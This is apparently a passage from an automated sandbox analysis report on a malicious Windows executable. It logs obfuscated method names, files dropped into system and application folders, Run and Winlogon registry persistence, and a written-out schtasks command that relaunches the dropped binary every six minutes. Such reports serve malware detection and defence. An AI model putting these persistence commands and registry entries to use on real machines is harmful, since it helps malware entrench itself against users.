Source: 0J5DzstGPi.exe, vfOZ8qxSBTsUSl5USVi.cs	High entropy of concatenated method names: 'P9X', 'yLDfxidZw0g', 'imethod_0', 'uFkxjaJMA5', 'zoepVIfsMlNmsa5RyKH8', 'H6c57wfsaa1Te41LQ7UD', 'Iisf4tfsHBWqB5xhH8EA', 'hCODQqfstycJ1iYsMG4v'
Source: 0J5DzstGPi.exe, tTemrnYOpoQluUcTjZD.cs	High entropy of concatenated method names: 'pnkfx9bYU5K', 'kmJfu8vJX41', 'tlyA0kfGSEd49iqXktur', 'cSSOmKfGlm0R40X15Llb', 'yXet2TfGjMLMPgpj2iEl', 'EgeA8WfGJscdGpeCT1PB', 'NLwTHZfGb7a0HnT5Hbo2', 'aPySr6fGm2GQnNLw3rV9', 'imethod_0', 'kmJfu8vJX41'
Source: 0J5DzstGPi.exe, wSA0fJ4bFycK4NKLNmX.cs	High entropy of concatenated method names: 'jBT4CgZfVf', 'pu34MjLWHo', 'tog4avT7fj', 'I8ZuLlfm3muY6HUn9HQU', 'hrZ7xxfmKHNQW28aow9V', 'WNVwAefmB5Kx62kyHA60', 'pGdelrfmooAQtf5FhXcQ', 'Ok13kafmIlIP7qisNV6F', 'RqfbdefmwuBcWjZKMRtr'
Source: 0J5DzstGPi.exe, g8B0G64thEhrxVF1sMp.cs	High entropy of concatenated method names: 'Ix2402aaSu', 'gcD4GouVei', 'KGf42jbGBm', 'ctl4rEhpUj', 'nCo4Fdy7iP', 'yCmSehfmV9H80MuiV55i', 'ebNu2yfmLCTfD3TdcvHH', 'tP2nEDfm7OBJsZQQtXNR', 'K44MWlfmZb31SHYIpnXw', 'S2SYsPfmntAutnLoLLKK'
Source: 0J5DzstGPi.exe, yQw6moAy2IAjaC2IycT.cs	High entropy of concatenated method names: 'Nw7AWpd6Dv', 'yCFAETpRK7', 'tnFAuKL0cE', 'TGZAh0fIHM', 'et4AxKa0sI', 'oaVAAqKOx1', 'A3KAv4CItK', 'DwnAQ9ihfm', 'UidAim04Es', 'z0vAk7ySUR'
Source: 0J5DzstGPi.exe, UonTL4FwmEWEa2TmssV.cs	High entropy of concatenated method names: 'uJQFProLtv', 'yYPF6dGEDX', 'exDFpSneuD', 'J4ZFesQB1m', 'n2vFDelGBO', 'T0BFsTWGaT', 'ijcFNKCPCX', 'pDUF58GNu8', 'lrxFO1uPJ2', 'PbPFqp8Z8p'
Source: 0J5DzstGPi.exe, ohgaYREdqOJXGNloRDO.cs	High entropy of concatenated method names: 'q64', 'P9X', 'LR5fW3UvMjK', 'vmethod_0', 'l1yfxuHrKrK', 'imethod_0', 'aLRMI9fpJrOFtp5i2H5t', 'og0aTOfpbfmJgDNHH7wF', 'SkwhEGfpmFWaxiMfoK8e', 'UW2bbnfpCTobgyfI3dOB'
Source: 0J5DzstGPi.exe, ag4rSEAnEyVJGKAxgi7.cs	High entropy of concatenated method names: 'RtS6IFfOL6wUGoidjmjK', 'LcDQwZfOwyIe2YLNMLte', 'hgCT34fOc1107g28DDOK', 'a9t3TkAgkW', 'DnfD4hfOVKE8g6CmEUKF', 'W4MvepfOZhExyoRhuf3A', 'qPib2mfOnvWdnMGc0nVq', 'X1P0HlfOR485c8gjD77u', 'J8rKfRCXox', 'qPobctfO4HNKESKhZEie'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

File written: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\tdboTeDy.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\Default\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\MzWJdjDq.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\EOeBPHNE.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\UciiGfGr.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\BKvCmawc.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\fQNZqrBZ.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\xcpeKNWo.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Recovery\sihost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\PCJszSHm.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\edFhLbSI.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\oMZxvDXp.log	Jump to dropped file

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

File created: C:\Users\Default\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe			Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe			Jump to dropped file

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\MzWJdjDq.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\PCJszSHm.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\EOeBPHNE.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\oMZxvDXp.log	Jump to dropped file
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Users\user\Desktop\edFhLbSI.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\tdboTeDy.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\xcpeKNWo.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\fQNZqrBZ.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\UciiGfGr.log	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	File created: C:\Users\user\Desktop\BKvCmawc.log	Jump to dropped file

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR

Jump to behavior

Creates an undocumented autostart registry key

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0J5DzstGPi	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

File created: C:\Users\Default\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "steBCuuQsIefcKufvgYbRBCxKhPRs" /sc MINUTE /mo 6 /tr "'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'" /f

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0J5DzstGPi	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0J5DzstGPi	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0J5DzstGPi	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0J5DzstGPi	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run steBCuuQsIefcKufvgYbRBCxKhPR	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
